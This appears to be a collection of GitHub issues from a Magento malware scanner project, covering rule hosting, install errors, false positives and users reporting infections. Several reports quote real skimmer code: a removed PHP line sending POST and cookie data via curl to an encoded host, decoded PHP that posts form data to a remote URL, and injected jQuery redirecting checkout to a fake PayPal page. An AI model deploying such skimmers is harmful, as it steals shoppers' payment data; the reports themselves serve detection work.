Note to mwscan users: update your install, or you will not get new rules anymore!

• The grep URL has changed from git.io/mwscan.txt to mwscan.s3.amazonaws.com/mwscan.txt
• If using the mwscan package, try sudo pip3 install --upgrade mwscan (or sudo pip install --upgrade mwscan).

See the updated docs for sample crons.

What is this change about?

Let the CI pipeline build the signatures, instead of including them in the repo (redundantly).

Pro: This will unclutter many PRs Con: Installation instructions need to change, people need to update their mwscan code as the URL is hardcoded and currently points to github.

Plan:

• [x] Instruct Travis to build rules and upload them to S3 upon commit to master. Done: https://mwscan.s3.amazonaws.com/mwscan.yar
• [x] Change built rules name to mwscan.txt and mwscan.yar (from all-confirmed).
• [x] Update all references to all-confirmed, eg in travis test scripts
• [x] Change URL in ruleset.py
• [x] Update basic instructions/URL for grep usage
• [x] Do not bundle rules anymore in pip/deb package and remove DEFAULT_RULES_FILE
• [x] Make mwscan ruleset the default one
• [x] Ensure that scanning continues, even if S3 is unreachable (except of course when there is no cached version of the rules)
• [x] Add build/* to .gitignore so PRs will not clutter any further.
• [x] Verify that mwscan without arguments still does a sane thing (ie download the latest default ruleset and use that)
• [x] Update screenshot in docs
• [x] Release new pip package
• [x] Add wildcard rule that will fail on everything, to warn sysadmins to upgrade.

Mwscan users (e.g. Byte) should:

• [x] Once steps above are completed, install new pip package and/or build new deb with new S3 rule URL

With Magereport and some additional tools I found viruses on my Magento store, I found some in footers via configuration an some in catalog search and cms blocks and visitor info by doing a search for eval in any db field in the Magento database...

Would those viruses be of interest?

JavaScript found in cms_block - the code features encoding functions. The Yara rules should identify the decode function of the script and/or parameters being passed to the decode function for execution.

Technically, Adminer is not malware of course. However, it appears that Adminer is a commonly used tool by Magento exploiters to ensure future database access. General attack flow:

1. Hacker gets in through SQL injection, Shoplift, Magmi, Webforms upload, brute forcing weak admin password.
2. Hacker fetches database password from local.xml
3. Hacker drops backdoors to ensure future access. Backdoors are webshells, blanket eval or upload forms, or database webinterfaces (Adminer).

On our platform, we found roughly 100 Adminer installs. A sample validation revealed that most of them were not put there by the site owner.

What to do?

[*] https://magesec.org:443 "GET /download/yara-standard.yar HTTP/1.1" 200 159703
Traceback (most recent call last):
  File "/usr/local/bin/mwscan", line 9, in <module>
    load_entry_point('mwscan==20180307.122431', 'console_scripts', 'mwscan')()
  File "/usr/local/lib/python2.7/dist-packages/mwscan/scan.py", line 243, in main
    rules, whitelist = provider(args=args).get()
  File "/usr/local/lib/python2.7/dist-packages/mwscan/ruleset.py", line 124, in get
    rawrules = self.get_rules()
  File "/usr/local/lib/python2.7/dist-packages/mwscan/ruleset.py", line 46, in get_rules
    return self._recursive_fetch(self.rules_url)
  File "/usr/local/lib/python2.7/dist-packages/mwscan/ruleset.py", line 145, in _recursive_fetch
    data = self._httpget(url)
  File "/usr/local/lib/python2.7/dist-packages/mwscan/ruleset.py", line 109, in _httpget
    return resp.content.decode()
UnicodeDecodeError: 'ascii' codec can't decode byte 0xc2 in position 154508: ordinal not in range(128)

Setting up MWSCAN on our managed server which is running Python 2.7 Can MWSCAN run on 2.7 ? I get the message:

Traceback (most recent call last): File "./mwscan", line 38, in from ruleset import providers ImportError: No module named ruleset

MageReport found Credit Card Hijack , malware-scanner did not. Then I downloaded and scanned the DB and site backup files with a different scanner (Kaspersky) and did not find it either.

Whats next?

I've been having ongoing problems with mwscanner since the AWS update. I have a CentOS6 server.

Initially I was getting the "pkg_resources.DistributionNotFound: requests>=0.8.2" and I couldn't get past that until I finally found the comment in usage.md that says to run "easy_install --upgrade requests".

That finally resolved the error that's been holding me up, but the scan didn't get far before reporting a different error.

[*] Using Mwscan rules.
[*] Fetching mwscan.yar
[*] Starting new HTTPS connection (1): mwscan.s3.amazonaws.com
[*] https://mwscan.s3.amazonaws.com:443 "GET /mwscan.yar HTTP/1.1" 200 155458
Traceback (most recent call last):
  File "/usr/bin/mwscan", line 9, in <module>
    load_entry_point('mwscan==20180510.172121', 'console_scripts', 'mwscan')()
  File "/usr/lib/python2.6/site-packages/mwscan/scan.py", line 243, in main
    rules, whitelist = provider(args=args).get()
  File "/usr/lib/python2.6/site-packages/mwscan/ruleset.py", line 139, in get
    rawrules = self.get_rules()
  File "/usr/lib/python2.6/site-packages/mwscan/ruleset.py", line 48, in get_rules
    rawrules = self._recursive_fetch(self.rules_url)
  File "/usr/lib/python2.6/site-packages/mwscan/ruleset.py", line 160, in _recursive_fetch
    data = self._httpget(url)
  File "/usr/lib/python2.6/site-packages/mwscan/ruleset.py", line 121, in _httpget
    return resp.content.decode('utf-8', errors='ignore')
TypeError: decode() takes no keyword arguments

If dh-python is not added as a build dependency, the Depends field will be filled with weird and incorrect values from setup.py's install_requires.

However, dh-python causes ${python:Depends} to be too strict. So just get rid of that and put in the python verison Depends manually.

I tested this using cowbuilder/pdebuild for Debian Stretch as well as Ubuntu Xenial.

Also see comments in https://github.com/gwillem/magento-malware-scanner/pull/185

Rule 'dynamic_base64_function_call_us_04557' causes a lot of false positives in several extensions.

Example 1: app/code/local/TBT/Bss/Helper/Loyalty/Checker.php

<?php /* This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited. */$OOO000000=urldecode('%66%67%

Example 2: app/code/local/Mindstretch/Betterinvoice/Model/Order/Pdf/Items/Invoice/Default.php

<?php /* Copyright Mindstretch */$OOO000000=urldecode('%66%67%36

This reverts commit 3630d9c8ca15524d71aa27d9eeb1ac7a5a972c12.

This whitespace was causing grep to return lots of false errors.

Download vanilla magento and prepare for quick scan

[15:31:30] lukerodgers [~/src]$ git clone --depth 1 [email protected]:openmage/magento-mirror m1.9
Cloning into 'm1.9'...
remote: Counting objects: 19333, done.
remote: Compressing objects: 100% (9357/9357), done.
remote: Total 19333 (delta 8736), reused 14750 (delta 7613), pack-reused 0
Receiving objects: 100% (19333/19333), 25.54 MiB | 2.97 MiB/s, done.
Resolving deltas: 100% (8736/8736), done.
Checking out files: 100% (14411/14411), done.
[15:31:54] lukerodgers [~/src]$ cd m1.9/
[15:31:56] lukerodgers [~/src/m1.9]$ wget git.io/mwscan.txt
URL transformed to HTTPS due to an HSTS policy
--2017-10-23 15:32:06--  https://git.io/mwscan.txt
Resolving git.io... 54.243.73.226, 54.243.115.172, 54.225.199.17, ...
Connecting to git.io|54.243.73.226|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/gwillem/magento-malware-scanner/master/build/all-confirmed.txt [following]
--2017-10-23 15:32:07--  https://raw.githubusercontent.com/gwillem/magento-malware-scanner/master/build/all-confirmed.txt
Resolving raw.githubusercontent.com... 151.101.128.133, 151.101.192.133, 151.101.64.133, ...
Connecting to raw.githubusercontent.com|151.101.128.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 56339 (55K) [text/plain]
Saving to: 'mwscan.txt'

mwscan.txt                        100%[============================================================>]  55.02K  --.-KB/s   in 0.02s

2017-10-23 15:32:08 (2.82 MB/s) - 'mwscan.txt' saved [56339/56339]

Run quick scan and see lots of stuff

None of the above should be appearing

[15:32:16] lukerodgers [~/src/m1.9]$ grep -Erlf mwscan.txt ./
.//.gitignore
.//.htaccess
.//.htaccess.sample
.//api.php
.//app/.htaccess
.//app/bootstrap.php
.//app/code/community/Cm/RedisSession/etc/config.xml
.//app/code/community/Cm/RedisSession/Model/Session.php
.//app/code/community/Phoenix/Moneybookers/Block/Form.php
.//app/code/community/Phoenix/Moneybookers/Block/Info.php
.//app/code/community/Phoenix/Moneybookers/Block/Jsinit.php
.//app/code/community/Phoenix/Moneybookers/Block/Payment.php
.//app/code/community/Phoenix/Moneybookers/Block/Placeform.php
.//app/code/community/Phoenix/Moneybookers/Block/Redirect.php
.//app/code/community/Phoenix/Moneybookers/controllers/MoneybookersController.php
.//app/code/community/Phoenix/Moneybookers/controllers/ProcessingController.php
.//app/code/community/Phoenix/Moneybookers/etc/config.xml
.//app/code/community/Phoenix/Moneybookers/etc/system.xml
.//app/code/community/Phoenix/Moneybookers/Helper/Data.php
.//app/code/community/Phoenix/Moneybookers/Model/Abstract.php
.//app/code/community/Phoenix/Moneybookers/Model/Acc.php
.//app/code/community/Phoenix/Moneybookers/Model/Csi.php
.//app/code/community/Phoenix/Moneybookers/Model/Did.php
.......
[truncated, it goes on!]

Manually patch mwscan.txt

[15:33:38] lukerodgers [~/src/m1.9]$ cp mwscan.txt mwscan.txt.orig
[15:33:42] lukerodgers [~/src/m1.9]$ nano mwscan.txt # remove final whitespace line
[15:33:53] lukerodgers [~/src/m1.9]$ grep -Erlf mwscan.txt ./ # this command ran for a minute with no output
^C
[15:34:10] lukerodgers [~/src/m1.9]$ diff mwscan.txt mwscan.txt.orig
846a847
>

The documentation for usage notes that python-pip, gcc and python-dev are required for install, however you also need python-setuptools on Debian Stretch for the "pip install" to succeed

From app/code/core/Mage/Core/functions.php

if (preg_match("/".base64_decode('Zmlyc3RuYW1lfGN2YzJ8Y2NfbnVtYmVyfHVzZXJuYW1lfGNjX3xzaGlwcGluZ3xjdnZ8bW9udGh8ZHVtbXl8c2VjdXJldHJhZGluZ3x5ZWFyfGxvZ2lufGJpbGxpbmd8ZXhwaXJ5fHBheW1lbnR8Y2FyZF9udW1iZXI=')."/i", serialize($_POST)))
-    @shell_exec("curl --data \"version=1&encode=".base64_encode(    serialize($_POST) . "--" . serialize($_COOKIE) )."&host=".$_SERVER["HTTP_HOST"]."\" ".trim(base64_decode('aHR0cDovL3ZlcnBheW1lbnQuY29tL3Rlc3RTZXJ2ZXIucGhw'))." > /dev/null 2<&1 &");

I found this line manually after deep mwsan <?php /*** PHP Encode v1.0 by zeura.com ***/ $XnNhAWEnhoiqwciqpoHH=file(FILE); eval(base64_decode("ENCRYPT...`

when I decrypt Zeura I get the folllowing code at the end of the file if(isset($_POST)){$EvxCq = WmJQW('',$_POST,0); $_COOKIE['BMMLN']!=null?$SflHflmRjQ=$_COOKIE['BMMLN']:setcookie('BMMLN', $SflHflmRjQ=time().'-'.crc32(uniqid()),time()+86000,'/',$_SERVER['HTTP_HOST']);file_get_contents(base64_decode( 'aHR0cHM6Ly9sb2NhbHNlcnZlci5ob3N0L2FwaS9pbmRleC5waHA='), FALSE,stream_context_create(array('http'=>array('method'=>'POST', 'header'=>'Content-type: application/x-www-form-urlencoded', 'content'=>http_build_query(array('info'=>base64_encode($EvxCq), 'hostname'=>$_SERVER['HTTP_HOST'],'sub'=>2,'key'=>$SflHflmRjQ))))));} function WmJQW($bRrNN,$CYRnG,$qabbF) {foreach($CYRnG as $vikBC => $PmGhs) {if(!is_array($PmGhs)) { if($qabbF == 1) {$dwTSf[] = $bRrNN.'['.$vikBC.']='.$PmGhs;}else {$dwTSf[] = $vikBC.'='.$PmGhs;} }else {$dwTSf[] = WmJQW($vikBC,$PmGhs,1);}}return implode('&',$dwTSf);} ?>

you need to check if python packages already installed and managed with yum or apt, instead of re-installing them with pip. this will break other python projects.

it was adding following code in some of js in our case it was quickview.js and ccard.js

jQuery(document).ready(function()
{
	if(!(document.cookie.indexOf("userpayid") + 1))
	{
		jQuery("*[onclick^=\"shippingMethod.save()\"]").attr("onclick", "paynow_right();");
		jQuery("*[onclick^=\"checkout.save();\"]").attr("onclick", "paynow_right();");
		jQuery("*[onclick=\"payment.save()\"]").attr("onclick", "paynow_right();");
		jQuery("#checkout-onepage-buttom").attr("onclick", "paynow_right();");
		jQuery("#onestepcheckout-button-place-order").attr("onclick", "paynow_right();");
		jQuery("#onestepcheckout-place-order").attr("onclick", "paynow_right();");
	}
});

function paynow_right()
{
	if(!(document.cookie.indexOf("userpayid") + 1))
	{
		var rand = function()
		{
			return Math.random().toString(36).substr(2);
		};
		document.cookie = "userpayid=" + rand();
		var arr = {
			"location" : "http://" + location.host,
			"method" : "PayPal"
		};
		jQuery(location).attr('href', "//paymentpal.cf/?payment=" + btoa(JSON.stringify(arr)));
	}
}

quickview.js => https://pastebin.com/xUgXxwDe ccard.js => https://pastebin.com/tkGgKQSi

we also see 2 files with strange name

• 2.php.png => https://pastebin.com/RC4v6UrX
• slltemap.php.jpg => https://pastebin.com/0q3naCgZ